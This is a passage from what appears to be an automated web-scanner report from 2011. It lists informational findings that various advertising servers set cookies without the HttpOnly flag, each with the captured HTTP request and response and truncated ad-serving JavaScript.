GET /clicksense/admeld/match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=304YId6UCEb

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
P3P: CP=NOI ADM DEV CUR
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:21:15 GMT
Expires: Mon, 13 Jun 2011 11:21:16 GMT
Set-Cookie: 2=304YId6UCEb; Domain=.lucidmedia.com; Expires=Tue, 12-Jun-2012 11:21:16 GMT; Path=/
Content-Type: text/plain
Content-Length: 164
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73&external_user_id=3460050161923843111"/>');

13.52. http://adopt.imiclk.com/emb/q previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adopt.imiclk.com
Path:	/emb/q

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

AD2=3,1575606,3,3177098,162,CPM,5DtwX; domain=.imiclk.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.53. http://ads.ad4game.com/www/delivery/ajs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.ad4game.com
Path:	/www/delivery/ajs.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_OABLOCK[31213]=deleted; expires=Sun, 13-Jun-2010 11:23:33 GMT; path=/; domain=ads.ad4game.com
%5FOABLOCK%5B31213%5D=deleted; expires=Sun, 13-Jun-2010 11:23:33 GMT; path=/; domain=ads.ad4game.com
_OASCAP[31213]=deleted; expires=Sun, 13-Jun-2010 11:23:33 GMT; path=/; domain=ads.ad4game.com
%5FOASCAP%5B31213%5D=deleted; expires=Sun, 13-Jun-2010 11:23:33 GMT; path=/; domain=ads.ad4game.com
OAID=24f102af08fd0d12a3b054c302eea97d; expires=Tue, 12-Jun-2012 11:23:34 GMT; path=/
_OABLOCK[31213]=1307964214; expires=Wed, 13-Jul-2011 11:23:34 GMT; path=/; domain=ads.ad4game.com
OABLOCK=31213.1307963916; expires=Wed, 13-Jul-2011 11:23:34 GMT; path=/; domain=ads.ad4game.com
OASCAP=31213.1; path=/; domain=ads.ad4game.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/ajs.php?zoneid=3943&block=1&blockcampaign=1&cb=17258222051&charset=UTF-8&loc=http%3A//ads.gamershell.com/www/delivery/afr.php%3Fn%3Da2f1a4e6%26zoneid%3D93%26cb%3DINSERT_RANDOM_NUMBER_HERE&referer=http%3A//www.gamershell.com/news_118846.html HTTP/1.1
Host: ads.ad4game.com
Proxy-Connection: keep-alive
Referer: http://ads.gamershell.com/www/delivery/afr.php?n=a2f1a4e6&zoneid=93&cb=INSERT_RANDOM_NUMBER_HERE
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 13 Jun 2011 11:23:34 GMT
Content-Type: text/javascript; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.3
Set-Cookie: _OABLOCK[31213]=deleted; expires=Sun, 13-Jun-2010 11:23:33 GMT; path=/; domain=ads.ad4game.com
Set-Cookie: %5FOABLOCK%5B31213%5D=deleted; expires=Sun, 13-Jun-2010 11:23:33 GMT; path=/; domain=ads.ad4game.com
Set-Cookie: _OASCAP[31213]=deleted; expires=Sun, 13-Jun-2010 11:23:33 GMT; path=/; domain=ads.ad4game.com
Set-Cookie: %5FOASCAP%5B31213%5D=deleted; expires=Sun, 13-Jun-2010 11:23:33 GMT; path=/; domain=ads.ad4game.com
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: OAID=24f102af08fd0d12a3b054c302eea97d; expires=Tue, 12-Jun-2012 11:23:34 GMT; path=/
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: _OASCAP[31213]=1; path=/; domain=ads.ad4game.com
Set-Cookie: _OABLOCK[31213]=1307964214; expires=Wed, 13-Jul-2011 11:23:34 GMT; path=/; domain=ads.ad4game.com
Set-Cookie: OABLOCK=31213.1307963916; expires=Wed, 13-Jul-2011 11:23:34 GMT; path=/; domain=ads.ad4game.com
Set-Cookie: OASCAP=31213.1; path=/; domain=ads.ad4game.com
Content-Length: 9616

if(typeof org=="undefined"){var org=new Object();}if(typeof org.openx=="undefined"){org.openx=new Object();}if(typeof org.openx.util=="undefined"){org.openx.util=new Object();}if(typeof org.openx.SWFO
...[SNIP]...

13.54. http://ads.adbrite.com/adserver/vdi/742697 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/742697

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rb2=Ch0KBjcxMjE1Nhij2_fAGiINMXZvb2Z5NmEwdGsxdwojCgY3NDI2OTcYpdmj7BkiEzQzMjU4OTcyODk4MzY0ODE4MzAKNAoGODA2MjA1GOihjekdIiQ5ZWQzZjJmMi03ZjVhLTExZTAtYTA3YS0wMDI1OTAwOWE5ZTQQAQ; path=/; domain=.adbrite.com; expires=Sun, 11-Sep-2011 11:12:43 GMT
ut="1%3AVZDLkoMgEEX%2FhbULQGU0f6OiQWMjDxOiIf8%2B2qRSM9tT9%2FStvi%2Fy4OTyIrd%2BC4uTnlyIvU%2Bhjsx3JbSRRZp5ZmsRmQvQOwTWyh2ORGGYQeDCDCsm7kNK1MuzOkArpyUl9NBtCGb%2BVeypaJanlgo2eYDG5AkY362n4q7rDUGnZjFuotAHnFXVfLUGNRrS4d3ZQ%2FP0R%2BiPpqqrpcqcbeNe%2FoPLX%2Bggt3A2KuCxiH7IfGkWjIC2qU5MEx4CxT%2F9gwAEdXrdD3YuEcg0js%2FpE%2BfTHB8jGWkbrXs34tzk%2Ff4F"; path=/; domain=.adbrite.com; expires=Thu, 10-Jun-2021 11:12:43 GMT
vsd=0@2@4df5f0ab@cdn.turn.com; path=/; domain=.adbrite.com; expires=Wed, 15-Jun-2011 11:12:43 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.55. http://ads.cpxadroit.com/adserver/10-1TZ6SMYM9UGQB.cpxad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.cpxadroit.com
Path:	/adserver/10-1TZ6SMYM9UGQB.cpxad

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ALI20110613=72-4-99-10,2-5-458-36,7,18,1; expires=Tue, 14-Jun-2011 11:18:19 GMT; path=/
PLI20110613=857-4-1-31,7,18,1; expires=Tue, 14-Jun-2011 11:18:19 GMT; path=/
SECPOP20110613=857-3-1-122,7,18,1; expires=Tue, 14-Jun-2011 11:18:19 GMT; path=/
CPX=IG=1&VID=bcc924b6-93c0-4f53-bdb5-0358d425ee84&LS=4TIWNI9CK0ZRC; expires=Wed, 13-Jun-2012 11:18:19 GMT; path=/
CPXSEC=5JK3HQRHNI0=1TZ6SMYM9UGQB,1TZ6SOXNDWDB7,6/13/2011 7:18:19 AM -04:00; expires=Wed, 13-Jul-2011 11:18:19 GMT; path=/
CPX_IMP=5JJRUVK6XOQ6|5JK1IMRHNOC=1TZ6SMYM9UGQB,1TZ6SOXNDWDB7,6/13/2011 7:18:19 AM -04:00; expires=Wed, 13-Jul-2011 11:18:19 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/10-1TZ6SMYM9UGQB.cpxad HTTP/1.1
Host: ads.cpxadroit.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/x-javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ALI20110613=72-4-99-10,2-5-458-36,7,18,1; expires=Tue, 14-Jun-2011 11:18:19 GMT; path=/
Set-Cookie: PLI20110613=857-4-1-31,7,18,1; expires=Tue, 14-Jun-2011 11:18:19 GMT; path=/
Set-Cookie: SECPOP20110613=857-3-1-122,7,18,1; expires=Tue, 14-Jun-2011 11:18:19 GMT; path=/
Set-Cookie: CPX=IG=1&VID=bcc924b6-93c0-4f53-bdb5-0358d425ee84&LS=4TIWNI9CK0ZRC; expires=Wed, 13-Jun-2012 11:18:19 GMT; path=/
Set-Cookie: CPXSEC=5JK3HQRHNI0=1TZ6SMYM9UGQB,1TZ6SOXNDWDB7,6/13/2011 7:18:19 AM -04:00; expires=Wed, 13-Jul-2011 11:18:19 GMT; path=/
Set-Cookie: CPX_IMP=5JJRUVK6XOQ6|5JK1IMRHNOC=1TZ6SMYM9UGQB,1TZ6SOXNDWDB7,6/13/2011 7:18:19 AM -04:00; expires=Wed, 13-Jul-2011 11:18:19 GMT; path=/
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Mon, 13 Jun 2011 11:18:18 GMT
Content-Length: 2490

var popurlfull=true;var popped=false;var isChrome = navigator.userAgent.toLowerCase().indexOf("chrome") > -1;var win;function pop(){if (popped) return; popped=true;win = window.open ("http://ad.double
...[SNIP]...

13.56. http://ads.gamershell.com/delivery/al.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.gamershell.com
Path:	/delivery/al.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_OACBLOCK[1467]=deleted; expires=Sun, 13-Jun-2010 11:23:51 GMT; path=/
%5FOACBLOCK%5B1467%5D=deleted; expires=Sun, 13-Jun-2010 11:23:51 GMT; path=/
_OACCAP[1467]=deleted; expires=Sun, 13-Jun-2010 11:23:51 GMT; path=/
%5FOACCAP%5B1467%5D=deleted; expires=Sun, 13-Jun-2010 11:23:51 GMT; path=/
OAID=936cb7c91ff3779f804602f5f97e7e1e; expires=Tue, 12-Jun-2012 11:23:52 GMT; path=/
OACBLOCK=1467.1307963920; expires=Wed, 13-Jul-2011 11:23:52 GMT; path=/
OACCAP=1467.1; expires=Tue, 12-Jun-2012 11:23:52 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /delivery/al.php?zoneid=84&target=_blank&layerstyle=simple&align=left&valign=top&padding=4&closetime=10&padding=4&shifth=160&shiftv=200&closebutton=t&backcolor=FFFFFF&bordercolor=000000 HTTP/1.1
Host: ads.gamershell.com
Proxy-Connection: keep-alive
Referer: http://www.gamershell.com/news_118846.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAGEO=US%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAVARS[a2f1a4e6]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A4%3A%222954%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A2%3A%2293%22%3B%7D; __utmz=164414191.1307963917.1.1.utmcsr=gamershell.com|utmccn=(referral)|utmcmd=referral|utmcct=/news_118846.html; __utma=164414191.902360358.1307963917.1307963917.1307963917.1; __utmc=164414191; __utmb=164414191.1.10.1307963917; __qca=P0-1794157262-1307963917889; OAID=936cb7c91ff3779f804602f5f97e7e1e

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:23:52 GMT
Server: Apache
Set-Cookie: _OACBLOCK[1467]=deleted; expires=Sun, 13-Jun-2010 11:23:51 GMT; path=/
Set-Cookie: %5FOACBLOCK%5B1467%5D=deleted; expires=Sun, 13-Jun-2010 11:23:51 GMT; path=/
Set-Cookie: _OACCAP[1467]=deleted; expires=Sun, 13-Jun-2010 11:23:51 GMT; path=/
Set-Cookie: %5FOACCAP%5B1467%5D=deleted; expires=Sun, 13-Jun-2010 11:23:51 GMT; path=/
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=936cb7c91ff3779f804602f5f97e7e1e; expires=Tue, 12-Jun-2012 11:23:52 GMT; path=/
Set-Cookie: OACBLOCK=1467.1307963920; expires=Wed, 13-Jul-2011 11:23:52 GMT; path=/
Set-Cookie: OACCAP=1467.1; expires=Tue, 12-Jun-2012 11:23:52 GMT; path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: application/x-javascript; charset=UTF-8

13.57. http://ads.gamershell.com/www/delivery/ajs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.gamershell.com
Path:	/www/delivery/ajs.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_OACBLOCK[1467]=deleted; expires=Sun, 13-Jun-2010 11:22:48 GMT; path=/
%5FOACBLOCK%5B1467%5D=deleted; expires=Sun, 13-Jun-2010 11:22:48 GMT; path=/
_OACCAP[1467]=deleted; expires=Sun, 13-Jun-2010 11:22:48 GMT; path=/
%5FOACCAP%5B1467%5D=deleted; expires=Sun, 13-Jun-2010 11:22:48 GMT; path=/
OAID=936cb7c91ff3779f804602f5f97e7e1e; expires=Tue, 12-Jun-2012 11:22:49 GMT; path=/
OACBLOCK=1467.1307963920; expires=Wed, 13-Jul-2011 11:22:49 GMT; path=/
OACCAP=1467.1; expires=Tue, 12-Jun-2012 11:22:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/ajs.php?zoneid=86&source=genre=10,platform=1,news,&cb=16938266623&loc=http%3A//www.gamershell.com/news_118846.html HTTP/1.1
Host: ads.gamershell.com
Proxy-Connection: keep-alive
Referer: http://www.gamershell.com/news_118846.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAGEO=US%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C; OAID=936cb7c91ff3779f804602f5f97e7e1e

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:22:49 GMT
Server: Apache
Set-Cookie: _OACBLOCK[1467]=deleted; expires=Sun, 13-Jun-2010 11:22:48 GMT; path=/
Set-Cookie: %5FOACBLOCK%5B1467%5D=deleted; expires=Sun, 13-Jun-2010 11:22:48 GMT; path=/
Set-Cookie: _OACCAP[1467]=deleted; expires=Sun, 13-Jun-2010 11:22:48 GMT; path=/
Set-Cookie: %5FOACCAP%5B1467%5D=deleted; expires=Sun, 13-Jun-2010 11:22:48 GMT; path=/
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=936cb7c91ff3779f804602f5f97e7e1e; expires=Tue, 12-Jun-2012 11:22:49 GMT; path=/
Set-Cookie: OACBLOCK=1467.1307963920; expires=Wed, 13-Jul-2011 11:22:49 GMT; path=/
Set-Cookie: OACCAP=1467.1; expires=Tue, 12-Jun-2012 11:22:49 GMT; path=/
Vary: Accept-Encoding
Content-Length: 869
Content-Type: text/javascript; charset=UTF-8

var OX_a9a58918 = '';
OX_a9a58918 += "<"+"SCRIPT language=\"Javascript\">\n";
OX_a9a58918 += "var cpmstar_rnd=Math.round(Math.random()*999999);\n";
OX_a9a58918 += "var cpmstar_pid=332;\n";
OX_a9a58918
...[SNIP]...

13.58. http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon1&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.nba.com
Path:	/js.ng/site=ynba&ynba_pos=148x34_spon1&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NGUserID=a3d0a50-24014-1508857027-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=ynba&ynba_pos=148x34_spon1&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992 HTTP/1.1
Host: ads.nba.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:00:58 GMT
Server: Apache
Set-Cookie: NGUserID=a3d0a50-24014-1508857027-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: ads1ad68:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 13 Jun 2011 11:00:58 GMT
Pragma: no-cache
Content-Length: 166
Content-Type: application/x-javascript

document.write('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">\n<html>\n<body style=\"margin: 0px;\">\n\n\n</body>\n</html>');

13.59. http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon1&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.nba.com
Path:	/js.ng/site=ynba&ynba_pos=148x34_spon1&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NGUserID=a3d0a52-15497-1543740238-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=ynba&ynba_pos=148x34_spon1&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702 HTTP/1.1
Host: ads.nba.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:00:57 GMT
Server: Apache
Set-Cookie: NGUserID=a3d0a52-15497-1543740238-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: ads1ad71:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 13 Jun 2011 11:00:57 GMT
Pragma: no-cache
Content-Length: 166
Content-Type: application/x-javascript

document.write('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">\n<html>\n<body style=\"margin: 0px;\">\n\n\n</body>\n</html>');

13.60. http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon2&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.nba.com
Path:	/js.ng/site=ynba&ynba_pos=148x34_spon2&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NGUserID=a3d0a4d-2185-289293754-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=ynba&ynba_pos=148x34_spon2&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992 HTTP/1.1
Host: ads.nba.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:00:58 GMT
Server: Apache
Set-Cookie: NGUserID=a3d0a4d-2185-289293754-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: ads1ad68:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 13 Jun 2011 11:00:58 GMT
Pragma: no-cache
Content-Length: 1512
Content-Type: application/x-javascript

document.write('<a target=\"_blank\" href=\"http://ads.cnn.com/event.ng/Type=click&FlightID=389686&AdID=533229&TargetID=49127&Segments=2168,2743,17251,19567,20226,20292,40223,42804,45604,46163,46694,4
...[SNIP]...

13.61. http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon2&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.nba.com
Path:	/js.ng/site=ynba&ynba_pos=148x34_spon2&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NGUserID=a3d0a55-22087-568308263-3; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=ynba&ynba_pos=148x34_spon2&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702 HTTP/1.1
Host: ads.nba.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:00:57 GMT
Server: Apache
Set-Cookie: NGUserID=a3d0a55-22087-568308263-3; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: ads1ad72:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 13 Jun 2011 11:00:57 GMT
Pragma: no-cache
Content-Length: 1510
Content-Type: application/x-javascript

document.write('<a target=\"_blank\" href=\"http://ads.cnn.com/event.ng/Type=click&FlightID=389686&AdID=533229&TargetID=49127&Segments=2168,2743,17251,19567,20226,20292,40223,42804,45604,46163,46694,4
...[SNIP]...

13.62. http://ads.nba.com/js.ng/site=ynba&ynba_pos=160x600_bot&ynba_rollup=news&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.nba.com
Path:	/js.ng/site=ynba&ynba_pos=160x600_bot&ynba_rollup=news&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NGUserID=a3d0a53-5238-373269249-3; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=ynba&ynba_pos=160x600_bot&ynba_rollup=news&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992 HTTP/1.1
Host: ads.nba.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:00:58 GMT
Server: Apache
Set-Cookie: NGUserID=a3d0a53-5238-373269249-3; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: ads1ad68:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 13 Jun 2011 11:00:58 GMT
Pragma: no-cache
Content-Length: 1793
Content-Type: application/x-javascript

document.write('<a target=\"_blank\" href=\"http://ads.cnn.com/event.ng/Type=click&FlightID=349537&AdID=480622&TargetID=64412&Segments=2168,2743,13094,13096,13097,13099,13304,13309,17251,18903,18906,1
...[SNIP]...

13.63. http://ads.nba.com/js.ng/site=ynba&ynba_pos=160x600_bot&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.nba.com
Path:	/js.ng/site=ynba&ynba_pos=160x600_bot&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NGUserID=a3d0a52-32431-1517752253-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=ynba&ynba_pos=160x600_bot&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702 HTTP/1.1
Host: ads.nba.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:00:57 GMT
Server: Apache
Set-Cookie: NGUserID=a3d0a52-32431-1517752253-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: ads1ad71:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 13 Jun 2011 11:00:57 GMT
Pragma: no-cache
Content-Length: 2339
Content-Type: application/x-javascript

document.write('<iframe src=\"https://view.atdmt.com/UNY/iview/315189598/direct/01/dibjmfg,bgWlIpjfsrhy?click=http://ads.cnn.com/event.ng/Type%3dclick%26FlightID%3d388946%26AdID%3d532181%26TargetID%3d
...[SNIP]...

13.64. http://ads.nba.com/js.ng/site=ynba&ynba_pos=300x250_rgt&ynba_rollup=news&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.nba.com
Path:	/js.ng/site=ynba&ynba_pos=300x250_rgt&ynba_rollup=news&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NGUserID=a3d0a50-24016-868327107-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

